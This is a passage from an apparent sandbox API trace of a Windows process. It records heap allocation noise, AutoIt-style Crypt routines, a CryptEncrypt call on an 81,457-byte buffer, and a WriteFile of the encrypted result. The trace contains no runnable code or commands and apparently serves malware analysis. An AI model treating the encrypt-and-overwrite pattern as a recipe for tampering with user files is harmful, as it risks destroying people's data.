hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.830] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.830] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.831] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0077.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0077.831] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.832] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.833] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.833] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.834] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x13e27, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x13e30) returned 1 [0077.834] CharLowerBuffW (in: lpsz="byte[81457]", cchLength=0xb | out: lpsz="byte[81457]") returned 0xb [0077.838] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.838] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cacd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0077.838] CryptEncrypt (in: hKey=0x41ac2c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x492bad8*, pdwDataLen=0x144e790*=0x13e27, dwBufLen=0x13e30 | out: pbData=0x492bad8*, pdwDataLen=0x144e790*=0x13e30) returned 1 [0077.838] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.838] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.838] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.841] WriteFile (in: hFile=0x258, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0x13e30, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144f194*=0x13e30, lpOverlapped=0x0) returned 1 [0077.844] TranslateMessage (lpMsg=0x144f2dc) returned 0 [0077.844] DispatchMessageW (lpMsg=0x144f2dc) returned 0x0 [0077.844] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0077.844] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0077.844] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0077.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0077.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0077.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca358 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca190 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1a8 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0077.845] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27c0 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0077.845] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0077.846] PeekMessageW (in: lpMsg=0x144e96c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e96c) returned 0 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0077.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0077.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca688, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0077.847] CryptDestroyKey (hKey=0x41ac2c0) returned 1 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0077.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0077.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0077.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0077.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0077.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0077.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0077.849] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0077.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0077.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0077.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0077.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0077.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0077.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0077.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0077.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0077.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0077.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0077.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0077.850] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0077.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0077.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0077.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0077.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0077.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0077.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0077.850] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0077.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0077.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.850] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0077.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0077.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0077.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0077.850] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0077.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0077.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0077.850] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0077.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0077.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0077.851] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0077.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0077.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0077.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0077.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0077.851] RtlAllocateHeap 